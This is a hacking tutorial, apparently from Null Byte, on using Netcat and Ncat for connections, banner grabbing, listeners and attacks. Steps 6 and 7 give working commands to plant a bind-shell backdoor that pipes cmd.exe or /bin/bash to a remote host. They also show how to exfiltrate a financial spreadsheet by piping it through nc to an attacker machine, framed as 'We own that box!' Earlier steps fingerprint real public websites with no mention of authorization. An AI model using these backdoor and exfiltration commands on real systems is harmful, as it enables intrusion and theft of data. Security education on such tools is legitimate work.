Hack Like a Pro: How to Use Netcat, the Swiss Army Knife of Hacking Tools

For over 20 years, a tiny but mighty tool has been used by hackers for a wide range of activities. Although well known in hacking circles, Netcat is virtually unknown outside. It's so simple, powerful, and useful that many people within the IT community refer to it as the "Swiss Army knife of hacking tools." We'll look at the capabilities of Netcat and how the aspiring hacker can use it.

What Is Netcat, Really?

Netcat, like so many hacker tools, was created to be a network analysis tool. Developed in 1995 by a fellow only known as "Hobbit," Netcat was given to the IT community without compensation but has received scores of accolades.

However, while still useful, it has not been maintained, so Nmap produced a modern version of it with more up-to-date features. The new version is called Ncat and, for the most part, has the same commands as Netcat so that they can be used interchangeably.

You can use either Netcat or Ncat to open up TCP and UDP connections between two machines over any port your heart desires. Also, these tools can be used for port scanning, similar to Nmap. Netcat and Ncat can be used for port forwarding, proxying, simple web server, and leaving an open backdoor for the hacker, as well.

Let's look at some of Netcat's capabilities using Kali Linux. Netcat should be installed, but Ncat might not be. To install either, just use one of the commands below.

apt-get install netcat

apt-get install ncat

Step 1: Open Netcat's Help Screen

Once we've fired up our Kali Linux system and opened a terminal, we can use Netcat from any directory since it's located in our bin directory which is in our PATH variable by default. So, let's type nc -h to see its help page.

nc -h

[v1.10-41.1]
connect to somewhere:	nc [-options] hostname port[s] [ports] ...
listen for inbound:	nc -l -p port [-options] [hostname] [port]
options:
	-c shell commands	as `-e'; use /bin/sh to exec [dangerous!!]
	-e filename		program to exec after connect [dangerous!!]
	-b			allow broadcasts
	-g gateway		source-routing hop point[s], up to 8
	-G num			source-routing pointer: 4, 8, 12, ...
	-h			this cruft
	-i secs			delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
	-l			listen mode, for inbound connects
	-n			numeric-only IP addresses, no DNS
	-o file			hex dump of traffic
	-p port			local port number
	-r			randomize local and remote ports
	-q secs			quit after EOF on stdin and delay of secs
	-s addr			local source address
	-T tos			set Type Of Service
	-t			answer TELNET negotiation
	-u			UDP mode
	-v			verbose [use twice to be more verbose]
	-w secs			timeout for connects and final net reads
	-C			Send CRLF as line-ending
	-z			zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

And this is for Ncat:

ncat -h

Ncat 7.70 ( https://nmap.org/ncat )
Usage: ncat [options] [hostname] [port]

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -U, --unixsock             Use Unix domain sockets only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec <command>    Executes the given command via /bin/sh
  -e, --exec <command>       Executes the given command
      --lua-exec <filename>  Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G <n>                     Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns <n>        Maximum <n> simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay <time>         Wait between read/writes
  -o, --output <filename>    Dump session data to a file
  -x, --hex-dump <filename>  Dump session data as hex to a file
  -i, --idle-timeout <time>  Idle read/write timeout
  -p, --source-port port     Specify source port to use
  -s, --source addr          Specify source address to use (doesn't affect -l)
  -l, --listen               Bind and listen for incoming connections
  -k, --keep-open            Accept multiple connections in listen mode
  -n, --nodns                Do not resolve hostnames via DNS
  -t, --telnet               Answer Telnet negotiations
  -u, --udp                  Use UDP instead of default TCP
      --sctp                 Use SCTP instead of default TCP
  -v, --verbose              Set verbosity level (can be used several times)
  -w, --wait <time>          Connect timeout
  -z                         Zero-I/O mode, report connection status only
      --append-output        Append rather than clobber specified output files
      --send-only            Only send data, ignoring received; quit on EOF
      --recv-only            Only receive data, never send anything
      --allow                Allow only given hosts to connect to Ncat
      --allowfile            A file of hosts allowed to connect to Ncat
      --deny                 Deny given hosts from connecting to Ncat
      --denyfile             A file of hosts denied from connecting to Ncat
      --broker               Enable Ncat's connection brokering mode
      --chat                 Start a simple Ncat chat server
      --proxy <addr[:port]>  Specify address of host to proxy through
      --proxy-type <type>    Specify proxy type ("http" or "socks4" or "socks5")
      --proxy-auth <auth>    Authenticate with HTTP or SOCKS proxy server
      --ssl                  Connect or listen with SSL
      --ssl-cert             Specify SSL certificate file (PEM) for listening
      --ssl-key              Specify SSL private key (PEM) for listening
      --ssl-verify           Verify trust and domain name of certificates
      --ssl-trustfile        PEM file containing trusted SSL certificates
      --ssl-ciphers          Cipherlist containing SSL ciphers to use
      --ssl-alpn             ALPN protocol list to use.
      --version              Display Ncat's version information and exit

See the ncat(1) manpage for full options, descriptions and usage examples

Step 2: Get the Basics Syntax Down

As you can see from the help screen above, the basic syntax for Netcat is the following. (Substitute nc for ncat if using Ncat instead of Netcat. We will just be using nc for the rest of this guide.)

To connect to another machine:

nc options host-IP-address port

To listen for inbound connections:

nc -l -p port

Step 3: Use Netcat to Connect to a Remote System

Let's go ahead and use Netcat to connect to a remote system. In this case, we will try to connect to a web server on port 80.

nc 192.168.1.105 80

That command gives us a TCP connection, by default, to the web server (port 80) at 192.168.1.105. Now, whatever we type, we will be sent directly to the web server when we hit enter.

Step 4: Use Netcat to Banner Grab for OS Fingerprinting

Before attacking any system, we need to know as much as possible about the target. So, once we have a TCP connection to a web server, we can use Netcat to grab the banner of the web server that's served up to new connections to identify what web-serving software the target is running.

A banner grab to the web server can be done with the HEAD / HTTP/1.0 command. Be careful and copy exactly as is with the slashes and spaces. Alternatively, if this doesn't work, you can try HEAD / HTTP/1.1 instead.

HEAD / HTTP/1.0

Hit enter a few times and the web server will respond with its banner telling us exactly what software it is running. In this case, we can see that the web server is running Microsoft's IIS 7.5.

HTTP/1.1 200 OK
Content-Length: 998
Content-Type: text/html
Content-Location: http://192.168.1.105/index.html
Last-Modified: Wed, 26 Sep 2018 17:59:41 GMT
Accept-Ranges: bytes
Etag: "e245c46986ecc61:93f"
Server: Microsoft-IIS/7.5
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 08 Dec 2018 02:14:35 GMT
Conection: close

We can use this technique on other public websites, as well. Let's try it on some widely known sites and see what web server software they're running.

First, let's try this website, wonderhowto.com. When we ping wonderhowto.com, we see that its IP address is 104.193.19.59. So, we throw that into the command, then, after getting a connection, we grab the web server banner. Remember to hit enter two or three times. As we can see, wonderhowto.com is running its own WonderHowTo server.

nc 104.193.19.59 80
HEAD / HTTP/1.0

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 141
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://wonderhowto.com/
Server: WonderHowTo
X-UA-Compatible: IE=Edge,chrome=1
X-Server-Name: APP01
X-Content-Type-Options: nosniff
Date: Sat, 08 Dec 2018 02:19:08 GMT
Connection: keep-alive

But that doesn't seem right. Let's try again with HEAD / HTTP/1.1 instead. As seen below, we get a bad request but do see that Microsoft-HTTPAPI/2.0 shows up, which is a common reading when the actual server is a Microsoft-IIS version.

nc 104.193.19.59 80
HEAD / HTTP/1.1

HTTP/1.1 400 Bad Request
Content-Length: 334
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 08 Dec 2018 03:04:29 GMT
Connection: close

If we try the same thing with ebay.com, we get the results below. As you can see, it runs on an Apache-Coyote.1.1 server.

nc 66.135.209.52 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: 49c752f2ba437586596f602605cb5820
Last-Modified: Fri, 8 Dec 2018 01:48:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 857
Date: Sat, 08 Dec 2018 02:38:44 GMT
Connection: keep-alive

Go ahead and try it on other websites and find out what server they're running. However, note that it may not work for all sites or you may not see the server information.

Step 5: Use Netcat to Listen for Connections

Now, let's use Netcat to create a listener on the remote system. Let's assume that we have a Windows server that we have installed Netcat on. We can now type the following to open a Netcat listener on port 6996 (it can be any port) on that system.

nc - l -p 6996

This has created a "listener" that we can connect to at our leisure.

C:\>
C:\>
C:\>
C:\>
C:\>
C:\>nc -l -p 6996

Note that on Windows systems, we can run this same command with an upper case L to create a persistent listener that will open up even if the system is rebooted.

Step 6: Create a Backdoor

Now, let's create a backdoor on the target system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.

For Windows, we use:

nc -l -p 6996 -e cmd.exe

For Linux, it's:

nc -l -p 6996 -e /bin/bash

This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system.

Next, on our attacking system, we type the following one-liner. As you can see, the Windows command prompt has been piped through our Netcat connection directly to our attacking system. We own that box!

nc 192.168.1.105 6996

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>

Step 7: Copy Files Out (Exfiltrate) from the Target

Netcat can also be used to exfiltrate files and data from the target. Let's imagine that there's data on the target system that we want, maybe financial data or data stored in a database. We can use a stealth connection to slowly copy that data out to our attack system. In this example, we will exfiltrate a file called financialprojections.xls, presumably an Excel file with financial projections.

From the source system, we type:

type financialprojections.xls | nc 192.168.1.104 6996

That command says to display the file financialprojections.xls, then pipe (|) it to Netcat (nc) to IP address 192.168.1.104 through port 6996.

02/26/2013  05:28 PM     <DIR>          WINDOWS
10/09/2006  03:55 PM     <DIR>          wmpub
               4 Files(s)         59,533 bytes
               8 Dir(s)    4,876,210,176 bytes free

C:\>type financialprojections.xls | nc 192.168.1.104 6996

C:\>type financialprojections.xls | nc 192.168.1.104 6996

From the destination system, we type:

nc -l -p 6996 > financialprojections.xls

That command says to create a listener (l) on port (p) 6996, then send the data received on this listener to a file named financialprojections.xls. We can see in the code below, after using ls -l, that the file was copied across our Netcat connection over port 6996 to our attacking machine!

ls -l

total 356
drwxr-xr-x 2 root root   4096 2011-05-07 11:46 Desktop
-rw-r--r-- 1 root root    141 2013-09-18 12:25 financialprojections.xls
-rw-r--r-- 1 root root    192 2013-09-02 13:49 replay_arp-0902-133213.cap
-rw-r--r-- 1 root root      0 2013-09-02 16:08 snortlog
-rw-r--r-- 1 root root 338111 2013-09-02 13:49 WEPcrack-01.cap
-rw-r--r-- 1 root root    575 2013-09-02 13:49 WEPcrack-01.csv
-rw-r--r-- 1 root root    582 2013-09-02 13:49 WEPcrack-01.kismet.csv
-rw-r--r-- 1 root root   3660 2013-09-02 13:49 WEPcrack-01.kismet.netxml

This is just a small sample of what this powerful little program can do. When you combine it with some basic scripting skills, you can only imagine the incredible things that can be accomplished.

• Follow Null Byte on Twitter, Flipboard, and YouTube
• Sign up for Null Byte's weekly newsletter
• Follow WonderHowTo on Facebook, Twitter, Pinterest, and Flipboard